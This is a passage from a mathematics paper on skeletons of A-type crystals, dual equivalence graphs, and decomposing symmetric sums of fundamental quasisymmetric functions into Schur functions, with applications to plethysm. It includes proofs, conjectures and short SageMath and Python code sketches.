Proof.: Crystal operators act on the weights \(\gamma\) of tableaux in \(B(\lambda)_{n}\). If a tableau \(T\) lies in \(B(T_{\alpha})\), it also has \(\alpha\preccurlyeq wt(T)=\gamma\). If \(f_{i}(T)\) lies in \(B(T_{\beta})\), then it means that \(\beta\preccurlyeq wt(f_{i}(T))=\gamma+(b_{i+1}-b_{i})\). This will also be the case for \((0^{k},\gamma)\), for \(0\leq k\leq n-s\), with the crystal operator having the corresponding action on the weights being \(f_{i+k}\). This means we can keep only the smallest label \(i\) on oriented edges between subcomponents. We then call the obtained skeleton \(Skeleton(\lambda)_{n}\).

**Theorem 5 :** For \(\lambda\vdash m\) fixed, let \(S\) be the maximal length of descent compositions for \(\lambda\). Then the skeletons \(Skeleton(\lambda)_{n}\) of the crystals \(B(\lambda)_{n}\) are equal for all \(n\geq S\). For \(1\leq n\leq S\), the skeleton of \(B(\lambda)_{n}\) consists of the induced subgraph of \(Skeleton(\lambda)_{S}\) containing standard tableaux of shape \(\lambda\) with descent compositions in at most \(n\) parts.

Proof.: Let's first consider two arbitrary subcomponents \(B(T_{\alpha})\), \(B(T_{\beta})\), for \(T_{\alpha},T_{\beta}\) of the same shape \(\lambda\), with respective weight and minimal parsing of type \(\alpha\) and \(\beta\), for incomparable descent compositions \(\alpha,\beta\).
Both subcomponents occur in all \(B(\lambda)_{n}\) for \(n\geq N=\max(\ell(\alpha),\ell(\beta))\). Suppose that there exists a minimal value \(k\in\mathbb{N}\) such that there exists an edge labelled \(i\) from \(B(T_{\alpha})\) into \(B(T_{\beta})\) in \(B(\lambda)_{N+k}\). There are then two tableaux \(T_{\gamma^{(1)}}\in B(T_{\alpha})\) and \(T_{\gamma^{(2)}}\in B(T_{\beta})\) such that \(\alpha\preccurlyeq\gamma^{(1)}\), \(\beta\preccurlyeq\gamma^{(2)}\) and \(f_{i}(T_{\gamma^{(1)}})=T_{\gamma^{(2)}}\). We then have \[\alpha\preccurlyeq\gamma^{(1)}=(\gamma_{1},\gamma_{2},\ldots, \gamma_{i-1},\gamma_{i},\gamma_{i+1},\gamma_{i+1},\ldots,\gamma_{N+k})\] \[\beta\preccurlyeq\gamma^{(2)}=(\gamma_{1},\gamma_{2},\ldots, \gamma_{i-1},\gamma_{i}-1,\gamma_{i+1}+1,\gamma_{i+1},\ldots,\gamma_{N+k}).\] The crystal operator \(f_{i}\) changes exactly one entry \(i\) into an entry \(i+1\) in \(T_{\gamma^{(1)}}\), but changes the minimal parsing. Therefore, it must act exactly on two maximal horizontal bands of \(T_{\gamma^{(1)}}\), modifying the maximal horizontal band containing that entry \(i\) and the one containing \((i+1)\)'s in \(T_{\gamma^{(1)}}\). Moreover, the entries \(i\) and \(i+1\) cannot be part of the same maximal horizontal band, otherwise the minimal parsing would not be changed. Recall that we can express a decomposition of \(\gamma^{(1)}\) and \(\gamma^{(2)}\) into subsets of parts, respectively summing to the parts of \(\alpha\) and \(\beta\), to represent the minimal parsing respectively of \(T_{\gamma^{(1)}}\) and \(T_{\gamma^{(2)}}\). Since they differ in exactly two maximal horizontal bands, then the decompositions of \(\gamma^{(1)}\) and \(\gamma^{(2)}\) have all subsets equal, except for those containing the \(i^{\text{th}}\) and \((i+1)^{\text{th}}\) parts. Suppose then that \(j_{1}<j_{2}<\ldots\) give the position of the last part of each subset, this gives the following decompositions, with potentially an added separation \(|\) before the \(i^{\text{th}}\) part and/or after the \((i+1)^{\text{th}}\) part, in \(\gamma^{(1)}\) and/or \(\gamma^{(2)}\). \[\begin{array}{c}\alpha\preccurlyeq\gamma^{(1)}=(\gamma_{1},\ldots,\gamma_{ j_{1}}|\gamma_{j_{1}+1},\ldots,\gamma_{j_{2}}|\ldots|\gamma_{j_{\ell+1}},\ldots, \gamma_{i}|\gamma_{i+1},\ldots,\gamma_{\ell+1}|\ldots,\gamma_{N+k})\\ \beta\preccurlyeq\gamma^{(2)}=(\gamma_{1},\ldots,\gamma_{j_{1}}|\gamma_{j_{1 }+1},\ldots,\gamma_{j_{2}}|\ldots|\gamma_{j_{\ell+1}},\ldots,\gamma_{i}-1| \gamma_{i+1}+1,\ldots,\gamma_{\ell+1}|\ldots,\gamma_{N+k}).\end{array}\] Now, since \(k\) is minimal by hypothesis, then there cannot be equal subsets with more than one part, because otherwise there exists two tableaux \(T_{\gamma^{(1)^{\prime}}},T_{\gamma^{(2)^{\prime}}}\) respectively in \(B(T_{\alpha})\) and \(B(T_{\beta})\) which have weights of smaller length that \(N+k\) obtained by summing parts of equal subsets, with \(T_{\gamma^{(1)^{\prime}}}\xrightarrow{j}T_{\gamma^{(2)^{\prime}}}\) in \(B(\lambda)_{n}\) for \(n<N+k\) and \(j\leq i\). For the same reason, there cannot be more than two parts in the subsets containing the \(i^{\rm th}\) and \((i+1)^{\rm th}\) parts in \(\gamma^{(1)}\) and \(\gamma^{(2)}\). 
We then have that the decomposition above is coarser, with again potentially an additionnal separation \(|\) before the \(i^{\rm th}\) part and/or after the \((i+1)^{\rm th}\) part, in \(\gamma^{(1)}\) and/or \(\gamma^{(2)}\): \(\begin{array}{c}\alpha\preccurlyeq\gamma^{(1)}=(\gamma_{1}|\gamma_{2}| \ldots|\gamma_{i-1},\gamma_{i}|\gamma_{i+1},\gamma_{i+2}|\ldots|\gamma_{N+k}) \\ \beta\preccurlyeq\gamma^{(2)}=(\gamma_{1}|\gamma_{2}|\ldots|\gamma_{i-1}, \gamma_{i}-1|\gamma_{i+1}+1,\gamma_{i+2}|\ldots|\gamma_{N+k}).\end{array}\) The different decompositions into subsets of the parts in posititon \(i-1\) to \(i+1\) are given below for \(\gamma^{(1)}\), the ones for \(\gamma^{(2)}\) are equivalent. \(\gamma_{i-1}|\gamma_{i}|\gamma_{i+1}|\gamma_{i+2}\) \(\gamma_{i-1},\gamma_{i}|\gamma_{i+1},\gamma_{i+2}\) \(\gamma_{i-1},\gamma_{i}|\gamma_{i+1}|\gamma_{i+2}\) \(\gamma_{i-1}|\gamma_{i}|\gamma_{i+1},\gamma_{i+2}\). Therefore \(k\leq 2\). Let's now study the different possibilities, depending on the position of the cell \(i\) modified by \(f_{i}\), in relationship to the (non-maximal) horizontal bands containing the entries \(i-1,i,i+1\) and \(i+2\). As we have seen, the entries \(i\) and \(i+1\) have to be in different maximal horizontal bands, otherwise the minimal parsing is preserved by \(f_{i}\). Then the \(i\)'s appear at the end of their maximal horizontal band, and the \((i+1)\)'s, at the start of theirs. We call the specific entry \(i\) modified by \(f_{i}\) in \(T_{\gamma^{(1)}}\)_the modified entry \(i\)_. All entries considered are in \(T_{\gamma^{(1)}}\). We consider how the modification of one entry \(i\) changes the division of \(\gamma^{(1)}\) into subsets to get that of \(\gamma^{(2)}\). Recall that the head of a (non-maximal) horizontal band is its northeastmost cell, and its tail, its southwestmost cell. Case \(1:\) If the modified entry \(i\) lays on a row of index strictly smaller than that of the tail of the horizontal band of the \(i+1\)'s, and weakly greater than that of the head of the horizontal band of the \(i+1\)'s, then the divisions in the corresponding weights \(\gamma^{(1)}\) and \(\gamma^{(2)}\) are in the same positions, so we say the divisions are preserved. This is because the change of that single entry \(i\) does not interfere with the entries \(i-1\) or \(i+2\). Case \(2:\) If the modified entry \(i\) lays on a row of index weakly greater than that of the tail of the horizontal band of the \(i+1\)'s, then there are three cases to consider. * If the modified entry \(i\) is not the tail of the horizontal band of entries \(i\), then the divisions are preserved. * If the modified entry \(i\) is the tail of the horizontal band of entries \(i\), and the next entry \(i\) of the horizontal band is southwest of the head of the horizontal band of the \(i-1\)'s, then the divisions are preserved. * If the modified entry \(i\) is the tail of the horizontal band of entries \(i\), and the next entry \(i\) of the horizontal band is weakly northeast of the head of the horizontal band of the \(i-1\)'s, then if there is a division between the \((i-1)^{\rm th}\) and \(i^{\rm th}\) parts in \(\gamma^{(1)}\), then it is removed in \(\gamma^{(2)}\). All other divisions are preserved. Case 3 : If the modified entry \(i\) is weakly northeast of the head of the horizontal band of the \(i+1\)'s, then there are similarly three cases to consider. * If the modified entry \(i\) is not the head of the horizontal band of entries \(i\), then the divisions are preserved. 
* If the modified entry \(i\) is the head of the horizontal band of entries \(i\), and the tail of the horizontal band of the \(i+2\)'s is to its northwest, then the divisions are preserved.
* If the modified entry \(i\) is the head of the horizontal band of entries \(i\), and the tail of the horizontal band of the \(i+2\)'s is weakly to its southwest, then if there is no division between the \((i+1)^{\rm th}\) and \((i+2)^{\rm th}\) parts in \(\gamma^{(1)}\), it is added in \(\gamma^{(2)}\). All other divisions are preserved.

There are then very limited cases in which a division is either added or removed, and otherwise divisions are preserved. Let's then consider which transitions are possible from the possible configurations of \(\gamma^{(1)}\).

Let's start with the configuration \((\gamma_{1}|\ldots|\gamma_{i-1}|\gamma_{i}|\gamma_{i+1}|\gamma_{i+2}|\ldots|\gamma_{N+k})\). Either divisions are preserved, or the division between the \((i-1)^{\rm th}\) and \(i^{\rm th}\) parts is removed, to get either of the configurations below in \(\gamma^{(2)}\). \[(\gamma_{1}|\ldots|\gamma_{i-1}|\gamma_{i}-1|\gamma_{i+1}+1|\gamma_{i+2}|\ldots|\gamma_{N+k})\ {\rm OR}\ (\gamma_{1}|\ldots|\gamma_{i-1},\gamma_{i}-1|\gamma_{i+1}+1|\gamma_{i+2}|\ldots|\gamma_{N+k}).\] Let's now consider the configuration \((\gamma_{1}|\ldots|\gamma_{i-1},\gamma_{i}|\gamma_{i+1},\gamma_{i+2}|\ldots|\gamma_{N+k})\). Either divisions are preserved, or the division between the \((i+1)^{\rm th}\) and \((i+2)^{\rm th}\) parts can be added, to get either of the configurations below in \(\gamma^{(2)}\). \[(\gamma_{1}|\ldots|\gamma_{i-1},\gamma_{i}-1|\gamma_{i+1}+1,\gamma_{i+2}|\ldots|\gamma_{N+k})\ {\rm OR}\ (\gamma_{1}|\ldots|\gamma_{i-1},\gamma_{i}-1|\gamma_{i+1}+1|\gamma_{i+2}|\ldots|\gamma_{N+k}).\] However, in these two cases, the \((i-1)^{\rm th}\) and \(i^{\rm th}\) parts can be summed (in \(\gamma^{(1)}\) and \(\gamma^{(2)}\)) to retrieve valid weights of smaller length, so they must be rejected. Let's now consider the configuration \((\gamma_{1}|\ldots|\gamma_{i-1},\gamma_{i}|\gamma_{i+1}|\gamma_{i+2}|\ldots|\gamma_{N+k})\). Divisions can only be preserved here, to get the configuration below in \(\gamma^{(2)}\). \[(\gamma_{1}|\ldots|\gamma_{i-1},\gamma_{i}-1|\gamma_{i+1}+1|\gamma_{i+2}|\ldots|\gamma_{N+k}).\] Similarly as for the previous configuration, the \((i-1)^{\rm th}\) and \(i^{\rm th}\) parts can be summed (in \(\gamma^{(1)}\) and \(\gamma^{(2)}\)) to retrieve weights of smaller length, so this must be rejected. Let's finally consider the configuration \((\gamma_{1}|\ldots|\gamma_{i-1}|\gamma_{i}|\gamma_{i+1},\gamma_{i+2}|\ldots|\gamma_{N+k})\). Either divisions are preserved, or the division between the \((i+1)^{\rm th}\) and \((i+2)^{\rm th}\) parts is added, to get either of the configurations below in \(\gamma^{(2)}\). \((\gamma_{1}|\ldots|\gamma_{i-1}|\gamma_{i}-1|\gamma_{i+1}+1,\gamma_{i+2}|\ldots|\gamma_{N+k})\) OR \((\gamma_{1}|\ldots|\gamma_{i-1}|\gamma_{i}-1|\gamma_{i+1}+1|\gamma_{i+2}|\ldots|\gamma_{N+k})\). In the first configuration above, the \((i+1)^{\text{th}}\) and \((i+2)^{\text{th}}\) parts can be summed (in \(\gamma^{(1)}\) and \(\gamma^{(2)}\)) to retrieve weights of smaller length, so this configuration must be rejected. The second one is valid.

There are then only three possible configurations for the divisions in \(\gamma^{(1)}\xrightarrow{i}\gamma^{(2)}\), such that \(k\) is minimal and the minimal parsing is modified by \(f_{i}\), going from \(T_{\gamma^{(1)}}\) to \(T_{\gamma^{(2)}}\).
What is most important for us here is to note that they force \(k=0\), and that \(|\ell(\alpha)-\ell(\beta)|\in\{0,1\}\). Note that there is a special case to consider when \(\gamma_{i}=1\), with \(\gamma_{i+1}\geq 1\) or \(\gamma_{i+1}=0\). The second case is easy since then the maximal horizontal bands are preserved. In the first case, the only possible configurations are the following. \[(\gamma_{1}|\ldots|\gamma_{i-1}|1|\gamma_{i+1},\gamma_{i+2}|\ldots|\gamma_{N+k})\xrightarrow{i}(\gamma_{1}|\ldots|\gamma_{i-1},0|\gamma_{i+1}+1|\gamma_{i+2}|\ldots|\gamma_{N+k})\text{ OR}\] \[(\gamma_{1}|\ldots|\gamma_{i-1}|1|\gamma_{i+1}|\gamma_{i+2}|\ldots|\gamma_{N+k})\xrightarrow{i}(\gamma_{1}|\ldots|\gamma_{i-1},0|\gamma_{i+1}+1|\gamma_{i+2}|\ldots|\gamma_{N+k}).\] In the second configuration, we still get \(k=0\). In the first one, these configurations are only possible if the only entry \(i\) is northeast of both the head of the horizontal band of the \(i+1\)'s and the tail of the \(i+2\)'s (in order to break their maximal horizontal band). However, \(f_{i}\) cannot change this entry, since the corresponding parenthesis sequence (for the parenthesis rule) will give \((\ldots()\), with at least one parenthesis ( to be paired with the parenthesis ) of the entry \(i\), so \(f_{i}\) must be null and the first configuration cannot occur. Then, in all cases, \(k=0\).

Therefore, if there exists a minimal edge labelled \(i\) between two subcomponents \(B(T_{\alpha})\) and \(B(T_{\beta})\), it occurs in \(B(\lambda)_{N}\) for \(N=\max(\ell(\alpha),\ell(\beta))\), and in all \(B(\lambda)_{n}\) for \(n\geq N\). Moreover, edges only occur between subcomponents associated to descent compositions which have equal length or whose lengths differ only by \(1\).

Now, \(B(\lambda)_{S}\) contains all tableaux of shape \(\lambda\) and filling at most \(S\). Since \(S\) is the maximal number of parts in descent compositions for \(\lambda\), all subcomponents associated to quasisymmetric functions \(F_{\alpha}\) occur in \(B(\lambda)_{S}\), with at least one tableau (if \(\ell(\alpha)=S\)). By the above result, all minimal edges will then also occur in \(B(\lambda)_{S}\). For all \(n\geq S\), all subcomponents occur, potentially with more tableaux. For \(n<S\), some subcomponents will be missing, but the minimal edges between occurring subcomponents will also occur by the previous result, so the obtained skeleton is the induced subgraph of \(Skeleton(\lambda)_{S}\) containing the standard tableaux with descent composition of length at most \(n\) as vertices. This gives the desired result. \(\blacksquare\)

We can define \(Skeleton(\lambda)=Skeleton(\lambda)_{S}\), where \(S\) is the maximal length of a descent composition for \(\lambda\). Then \(Skeleton(\lambda)\) is also the underlying structure of \(B(\lambda)\). It is a corollary of the proof that

**Corollary 4.9 :** There are edges in \(Skeleton(\lambda)\) only between standard tableaux whose numbers of descents differ by at most 1.

**Conjecture 4.10 :** Let \(H_{s}\) be the induced subgraph of \(Skeleton(\lambda)\) whose vertices are the standard tableaux with descent compositions having \(s\) parts. Then \(H_{s}\) is either a

* Disjoint union of singleton(s), or
* Disjoint union of chain(s), or
* Disjoint union of even cycle(s) with, or without, two extra attached vertices giving the source(s) and sink(s).

Multiple edges occur only between such induced subgraphs associated to different descent composition lengths \(s\).
This has been verified for all partitions \(\lambda\vdash m\) with \(m\leq 6\). Figure 4 illustrates different cases of the conjecture.

Figure 4: Structure of induced subgraphs of \(Skeleton(\lambda)\) whose vertices are standard tableaux with a fixed number of descents

It would be interesting to study further this notion of skeleton of crystals. In particular, Danilov, Karzanov and Koshevoy have done so, along with studying the notion of subcrystals [4], in the alternative crossing model for \(A_{n-1}\) crystals. They introduced alternate combinatorial objects as vertices of crystals, defined crystal operators on these objects by using feasible functions, and showed that this does give an alternative model for \(A_{n-1}\) crystals by using Stembridge axioms. Some results may then have connections to those found here, but the vastly different setting makes comparisons difficult. It would however be extremely interesting to further study the connections with their results.

## 5 Crystal skeleton and dual equivalence graphs as relations between the plactic and coplactic monoids

In this section, we explore the relationship between the skeleton and the dual equivalence graphs introduced by Assaf [2], which give another oriented graph structure on standard tableaux. We will see how the fundamental quasisymmetric functions can be seen as describing the relationship between the plactic and coplactic monoids, and how relations between them encode dual \(RSK\) equivalences. Let's start by recalling certain definitions.

### RSK algorithm, jeu de taquin, plactic and coplactic monoids in crystals

Recall that the RSK algorithm associates to any word \(w\) a pair of tableaux \((P(w),Q(w))\). See [10] or [22] for a full description of the algorithm. The tableau \(P(w)\) is called the insertion tableau of \(w\), and will have the same weight as \(w\). The tableau \(Q(w)\) is called the recording tableau of \(w\), and is standard in this context. Words then form the plactic monoid, with concatenation as product, and Knuth relations as equivalence relations [2]. All words in the same equivalence class in the plactic monoid are mapped onto the same insertion tableau \(P\), and its row reading word \(rw(P)\) can be seen as a representative of this Knuth-equivalence class. We will take this as the definition for words to be _plactically equivalent_.

_Jeu de taquin_ allows one, among other things, to translate Knuth relations (of the plactic monoid on words) to tableaux, and to describe a crystal structure on skew tableaux: tableaux on shapes \(\lambda/\mu\), where the cells of \(\mu\) are blanks in \(\lambda\), and the other cells are filled with the usual row and column conditions. Its effect on these skew tableaux then corresponds to applying the Knuth relations to the associated reading words. Starting with a skew tableau, blanks pass through non-empty cells, always preserving the conditions on rows and columns. A jeu de taquin slide always starts at an inner corner, having non-empty cells to its right and under it, exchanging it successively with non-empty cells until it lies on the outer shape of \(\lambda\) and no more exchanges are possible. Doing this process recursively allows one to "rectify" the tableau to a partition shape. This tableau is called the _rectification_ of the initial skew tableau. The rectification is unique, so the order of the slides doesn't matter.
For example, a skew tableau \(T\) of skew shape \((5,5,3)/(2,2)\) is rectified in five jeu de taquin slides, where the inner corners used for the slides are identified by red cells and the entries moved in each slide appear in red (the corresponding sequence of diagrams is omitted here).

All words with the same recording tableau \(Q(w)\) are said to be coplactically equivalent (in the associated coplactic monoid). They all land in the same connected crystal. In particular, coplactic equivalences preserve descents by the above proposition.

### Relation between plactic and coplactic monoids: skeleton and dual equivalence graphs

The relation between plactic and coplactic classes is illustrated by the well known fact that if \(RSK(w)=(P(w),Q(w))\), then \(RSK(w^{-1})=(Q(w),P(w))\) (see Theorem 10.112 of [11]). This correspondence works for any word, not only permutations, by using the \(RSK\) map on biwords, where the inverse of a biword is easily computed. In this context, the recording tableau \(Q(w)\) may be semistandard. This can then be understood by linking standard tableaux of shape \(\lambda\vdash m\) indexing connected crystal components \(B(\lambda)\) in \([n]^{\otimes m}\), and the associated subcomponents of \(B(\lambda)\). They can be seen as the inverse images of the relation in RSK, exchanging the \(P,Q\)-tableaux as the effect of considering \(w^{-1}\): standard tableaux expand into their associated subcomponent as the subcomponents shrink to their associated standard tableau, respectively under destandardization in all possible ways which preserve the minimal parsing, and standardization. The fundamental quasisymmetric functions \(F_{\alpha}\) and their associated subcomponents can then be seen as representing the relation between plactic and coplactic classes. This new interpretation of these relationships establishes additional relations between connected components \(B(\lambda)\) in the tensor power \(B(1)^{\otimes m}\).

Other interesting relations are often referred to as _dual RSK relations_: equivalences, generally on permutations, with the following elementary transformations on letters \(i-1\), \(i\) and \(i+1\) in a permutation, according to their relative positions: \[\begin{array}{ccccccc}i&i+1&i-1&\xleftrightarrow{i}&i-1&i+1&i\\ i&i-1&i+1&\xleftrightarrow{i}&i+1&i-1&i\end{array}\] Note that these elementary transformations do not correspond to coplactic relations, in particular since they introduce (or remove) descents. Assaf introduced dual equivalence graphs to represent these dual RSK relations on permutations as actions on the standard tableaux with these permutations as reading words [20]. They are then graphs on standard tableaux, just like our skeleton of crystals. Even though they are defined very differently, these two types of oriented graph structures on standard tableaux are surprisingly similar. The associated dual equivalence graph for \(\lambda=(4,3)\), as defined by Assaf, would be the one illustrated in figure 5. Its graph structure differs from that of figure 3 only by seven missing edges. Franco Saliola suggested that the dual equivalence graph for \(\lambda\) is a subgraph of \(Skeleton(\lambda)\).
We conjecture further that

**Conjecture 5.3 :** The dual equivalence graph for \(\lambda\) is a subgraph of \(Skeleton(\lambda)\), in the sense that, forgetting orientations and labels, if there are \(r\) two-sided arrows between two standard tableaux in the dual equivalence graph, there are also \(r\) edges between the same standard tableaux in \(Skeleton(\lambda)\). Moreover, if \(Skeleton(\lambda)\) has \(r>1\) edges between two standard tableaux, then there are \(r\) edges between the same standard tableaux in the dual equivalence graph for \(\lambda\).

This conjecture has been verified for all partitions \(\lambda\vdash m\) with \(m\leq 6\). We also note that most of the time the two graph structures are equal. The skeleton would then encode the dual RSK equivalences (among other relations) on standard tableaux. Note that the reading words of all tableaux with the same minimal parsing standardize to the same permutation, as noted in example 1.5. All these tableaux correspond to the vertices of a subcomponent \(B(T_{\alpha})\), mapped onto \(std(T_{\alpha})\) in the skeleton. We can then see the skeleton as encoding relations between permutations (reading words of the standard tableaux). However, the fact that these relations are generally dual RSK equivalences is surprising.

Figure 5: Dual equivalence graph for \(\lambda=(4,3)\), following the definition of Assaf [2].

## 6 Applications to plethysm

### Counting monomials in plethysms \(s_{\mu}[s_{\lambda}]\)

As discussed in the introduction, plethysms of two Schur functions \(s_{\mu}[s_{\lambda}]\) have a decomposition in the basis of fundamental quasisymmetric functions [10]: \[s_{\mu}[s_{\lambda}]=\sum_{A\in S_{a,b}(\mu,\lambda)}F_{Asc(A)}.\] In this formula, \(\mu\vdash a\), \(\lambda\vdash b\), \(S_{a,b}(\mu,\lambda)\) is a set of \(a\times b\) 'standard' matrices which depend on the shapes \(\mu\) and \(\lambda\), and \(Asc(A)\) is a composition recording the ascents of the word read off the matrix \(A\) under an intricate reading order. The matrices are built from what Loehr and Warrington call tableaux of tableaux: entries of the tableau of shape \(\mu\) are tableaux of shape \(\lambda\). We then say they have _shape_ \(\lambda^{\mu}\). When a total order on tableaux is fixed, the tableaux of tableaux of shape \(\lambda^{\mu}\) give the monomials of \(s_{\mu}[s_{\lambda}]\) (see for example [De Boeck et al., 2021], [Loehr and Warrington, 2012], [Stanley and Fomin, 1999], etc.). One definition of plethysm is in terms of the variable substitution of the \(x_{1},x_{2},\ldots\) in \(s_{\mu}\) by the monic monomials of \(s_{\lambda}\) (monomials with coefficient \(1\)). Monomials with coefficients \(c\in\mathbb{N}\) greater than \(1\) are simply broken down into \(c\) monic monomials. Since both functions in the plethysm are Schur functions (hence symmetric), the order of the monomials is not important, and the concept of tableaux of tableaux makes perfect sense. By using the results above, we have that

**Corollary 6.1 :** The number of monic monomials in a plethysm \(s_{\mu}[s_{\lambda}(x_{1},\ldots,x_{n})]\) is equal to \(|SSYT(\mu)_{|SSYT(\lambda)_{n}|}|\).

Proof.: One need only consider the plethystic substitution of the monic monomials of the Schur function \(s_{\lambda}(x_{1},x_{2},\ldots,x_{n})\) into \(s_{\mu}\).
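Corollary 6.1 is easy to test computationally. The following is a minimal sketch meant to be run inside SageMath; it assumes SageMath's `SymmetricFunctions` and `SemistandardTableaux` interfaces, and the function name `monic_monomial_count` is ours, introduced only for this illustration.

```python
# Sketch to be run inside SageMath; names and API assumptions are ours.
def monic_monomial_count(mu, lam, n):
    """Number of monic monomials of s_mu[s_lam(x_1,...,x_n)], i.e. the sum
    of the coefficients of its expansion in n variables."""
    s = SymmetricFunctions(QQ).s()
    poly = s(mu).plethysm(s(lam)).expand(n)
    return sum(poly.coefficients())

mu, lam, n = [2, 1], [2], 3
N = SemistandardTableaux(lam, max_entry=n).cardinality()    # |SSYT(lam)_n|
lhs = monic_monomial_count(mu, lam, n)
rhs = SemistandardTableaux(mu, max_entry=N).cardinality()   # |SSYT(mu)_N|
print(lhs, rhs, lhs == rhs)
```

In the small cases tested this way, both counts agree, as the corollary predicts.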
### Decomposing a symmetric sum of quasisymmetric functions into the basis of Schur functions

Since plethysms are symmetric, and the plethysm of two Schur functions can be expressed as a symmetric sum of fundamental quasisymmetric functions, giving a combinatorial description of the passage from this expression to one in the Schur basis might help make progress on plethysm problems. If \(f\) is a symmetric function with decomposition into the basis of quasisymmetric functions \(f=\sum d_{\alpha}F_{\alpha}\), we can replace the \(F_{\alpha}\) by generalized Schur functions \(s_{\alpha}\), defined using the Jacobi-Trudi definition on determinants, with the same coefficients [Garsia and Remmel, 2018]. A generalized Schur function \(s_{\alpha}\) is equal to \(\pm s_{\lambda}\), for some partition \(\lambda\). Then a lot of generalized Schur functions cancel out, so this is far from efficient. For a symmetric \(f=\sum d_{\alpha}F_{\alpha}\), another way to express it in the Schur basis is through multiple changes of basis: fundamental quasisymmetric functions to monomial quasisymmetric functions, to monomial symmetric functions, to Schur functions. This is computationally faster, so this is the algorithm implemented in SageMath. However, it doesn't give much insight into the relationship between the two bases, which is what truly interests us. We can then use the results above to give another way of expressing a symmetric function (given in terms of fundamental quasisymmetric functions) in the basis of Schur functions.

**Proposition 6.2 :** Let \(f\) be a symmetric function which admits a decomposition \(f=\sum_{\beta}c_{\beta}F_{\beta}\) into the basis of fundamental quasisymmetric functions. Let \(\alpha\) be the maximal descent composition appearing in the decomposition of \(f\) for the lexicographical order. Then \(\alpha\) is a partition, and \(f-c_{\alpha}s_{\alpha}\) is Schur-positive and \(F\)-positive.

_Proof_. Since \(f\) is symmetric, it must admit a (unique) decomposition into the basis of Schur functions. We have seen in proposition 2.4 that the partitions \(\lambda\) such that \(F_{\alpha}\) can appear in \(s_{\lambda}\) must have \(\lambda_{1}\geq\alpha_{i}\), so in particular \(\lambda_{1}\geq\alpha_{1}\). We must also have that \(\lambda_{1}+\lambda_{2}+\ldots+\lambda_{j}\geq\alpha_{1}+\alpha_{2}+\ldots+\alpha_{j}\) for all \(j\), so \(\alpha\leq_{lex}\lambda\), with \(\leq_{lex}\) the lexicographical order. If \(s_{\lambda}\) appears in \(f\), then \(F_{\lambda}\) must appear in the decomposition of \(f\) in the basis of quasisymmetric functions. This is because \(s_{\lambda}=\sum_{T\in SYT(\lambda)}F_{compDes(T)}\), and \(\lambda\) is the descent composition of the standard tableau often referred to as the _superstandard tableau_, which has destandardization (according to its minimal parsing) \(1_{\lambda}\). Since we have picked \(\alpha\) maximal for the lexicographical order among all descent compositions appearing in the decomposition of \(f\), we have \(c_{\gamma}=0\) for all \(\gamma>_{lex}\alpha\). We must then have that \(\alpha=\lambda\) is a partition, that \(s_{\alpha}\) appears \(c_{\alpha}\) times in the decomposition of \(f\) in the basis of Schur functions, and so that \(f-c_{\alpha}s_{\alpha}\) is symmetric and has a decomposition in the basis of fundamental quasisymmetric functions with only positive coefficients.
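To make this greedy peeling concrete before it is stated formally as Algorithm 6.4 below, here is a minimal, self-contained Python sketch. The \(F\)-expansion is represented as a dictionary keyed by compositions (tuples); all helper names are ours and only illustrate the idea, they are not the implementation used for the computations in this paper.

```python
def standard_tableaux(shape):
    """Yield all standard Young tableaux of the given partition shape,
    as lists of rows (entries 1..n inserted in increasing order)."""
    n = sum(shape)
    def build(tab, k):
        if k > n:
            yield [list(row) for row in tab]
            return
        for r, row in enumerate(tab):
            # k may go in row r if the row is not full and the cell above exists
            if len(row) < shape[r] and (r == 0 or len(tab[r - 1]) > len(row)):
                row.append(k)
                yield from build(tab, k + 1)
                row.pop()
    yield from build([[] for _ in shape], 1)

def descent_composition(tab):
    """Descent composition of a standard tableau: i is a descent when
    i+1 sits in a strictly lower row than i."""
    n = sum(len(row) for row in tab)
    row_of = {v: r for r, row in enumerate(tab) for v in row}
    descents = [i for i in range(1, n) if row_of[i + 1] > row_of[i]]
    comp, prev = [], 0
    for d in descents + [n]:
        comp.append(d - prev)
        prev = d
    return tuple(comp)

def schur_in_F(shape):
    """F-expansion of s_shape as a dict {composition: multiplicity}."""
    exp = {}
    for T in standard_tableaux(shape):
        c = descent_composition(T)
        exp[c] = exp.get(c, 0) + 1
    return exp

def F_to_schur(f_expansion):
    """Greedy peeling: f_expansion is {composition: coeff} of a symmetric
    function; returns its Schur expansion {partition: coeff}."""
    S = {a: c for a, c in f_expansion.items() if c}
    schur = {}
    while S:
        alpha = max(S)                    # lexicographically largest support
        assert list(alpha) == sorted(alpha, reverse=True)  # must be a partition
        c = S[alpha]
        schur[alpha] = c
        for beta, mult in schur_in_F(list(alpha)).items():
            S[beta] = S.get(beta, 0) - c * mult
            if S[beta] == 0:
                del S[beta]
    return schur

# Example: peeling the F-expansion of s_{3,2} recovers {(3, 2): 1}.
print(F_to_schur(schur_in_F([3, 2])))
```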
**Corollary 6.3 :** The following algorithm gives the decomposition of a symmetric function \(f\), expressed in the basis of fundamental quasisymmetric functions, into the Schur basis.

**Algorithm 6.4 :** Let \(f\) be a symmetric function with an expression in the basis of fundamental quasisymmetric functions \(f=\sum_{\beta}c_{\beta}F_{\beta}\). Let \(S=f\), and reset \(f=0\).

1. Let \(\alpha\) be the leading support, i.e. the largest descent composition appearing in \(S\) for the lexicographical order. It must be a partition.
2. Let \(S=S-c_{\alpha}\left(\sum_{T\in SYT(\alpha)}F_{compDes(T)}\right)\) and \(f=f+c_{\alpha}s_{\alpha}\).
3. Repeat until \(S=0\).

Then \(f\) is expressed in the basis of Schur functions.

**Remark 6.5 :** This algorithm is rather simple and straightforward from the definitions, so others may have used it before. However, it seems to be absent from the literature. Its main interest lies in its underlying construction, as it is generally not more efficient than the algorithm implemented in SageMath (when computing the decomposition of a random symmetric sum of quasisymmetric functions of degree \(n\) into the Schur basis). Maybe plethysm is even more closely related to fundamental quasisymmetric functions than we thought.

**Remark 6.6 :** This algorithm may explain the result of De Boeck, Paget and Wildon, stating that a Schur function \(s_{\nu}\) occurs in a plethysm \(s_{\mu}[s_{\lambda}]\) with multiplicity given exactly by the number of _maximal plethystic tableaux of weight_ \(\nu\) if and only if \(\nu\) is maximal for the lexicographical order for \(\mu,\lambda\) [De Boeck et al., 2021]. Maximal here indicates that no entry \(c\) of a tableau-entry can be changed to an entry \(c-1\) without breaking the condition of the larger tableau being semistandard.

## Conclusion

We now have a better understanding of the decomposition of Schur functions into quasisymmetric functions, and of the relationships between them. We may now use this to find a more direct expression of the plethysm of two Schur functions in the basis of Schur functions.

## Acknowledgements

I thank Franco Saliola for his support throughout this project. I also thank those who contributed to SageMath, which helped test examples and generate figures, and those behind the OEIS, which helped formulate proposition 3.6. FMG received funding from NSERC.

## Annex: Proofs for EVAC

